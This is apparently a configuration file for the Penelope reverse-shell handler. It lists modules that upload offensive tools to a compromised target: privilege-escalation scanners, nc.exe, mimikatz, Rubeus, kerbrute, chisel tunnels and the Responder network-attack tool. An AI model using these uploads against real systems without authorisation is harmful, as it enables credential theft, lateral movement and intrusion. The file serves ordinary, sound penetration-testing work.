# Penelope options
[options]
modules = {
	'upload_privesc_scripts':{
		'description':'Upload privilege escalation scripts to the target',
		'actions':{
			'Unix':[
				'upload https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh',
				'upload https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh',
				'upload https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py',
				'upload https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py',
				'upload https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64'
			],
			'Windows':[
				'upload https://github.com/int0x33/nc.exe/blob/master/nc.exe?raw=true',
				'upload https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1',
				'upload https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/Offline_WinPwn.ps1',
				'upload https://github.com/carlospolop/PEASS-ng/releases/download/20220626/winPEASany.exe',
				'upload https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1'
			]
		}
	},
	'upload_active_directory':{
		'description':'upload AD scripts',
		'actions':{
			'Unix':[
				'upload /opt/shared-folder/kerbrute_linux_amd64'
			],
			'Windows':[
				'upload https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS.ps1',
				'upload https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/dotnet%20v4.7.2%20compiled%20binaries/Rubeus.exe?raw=true',
				'upload https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe?raw=true'
			]
		}
	},
	'upload_networking_tools':{
		'description':'upload networking tools',
		'actions':{
			'Unix':[
				'upload /opt/chisel',
				'upload https://raw.githubusercontent.com/unixhostpro/shadowsocks-simple-install/master/shadowsocks-simple-install.sh'
			],
			'Windows':[
				'upload https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe',
				'upload /opt/chisel.exe'
			]
		}
	},
	'upload_mitm_tools':{
		'description':'upload tools for local area network attacks',
		'actions':{
			'Unix':[
				'upload https://github.com/lgandx/Responder/archive/refs/heads/master.zip'
			],
			'Windows':[
			]
		}
	},
	'template':{
                'description':'',
                'actions':{
                        'Unix':[
                        ],
                        'Windows':[
                        ]
                }
        }
	}	
#All options that are appeared with the SET menu command can be overriden here. Some examples:
#no_log = True                          # Do not create session log files.   -> Default: False
#escape = {'sequence':b'~', 'key':'~'}  # Use tilde for escaping PTY         -> Default: {'sequence':b'\x1b[24~', 'key':'F12'}
#basedir = Path("/opt/shared-folder/penelope")        # Change the base directory          -> Default: Path("~/.penelope")
#port = 4343                            # Change the default listener port   -> Default: 4444
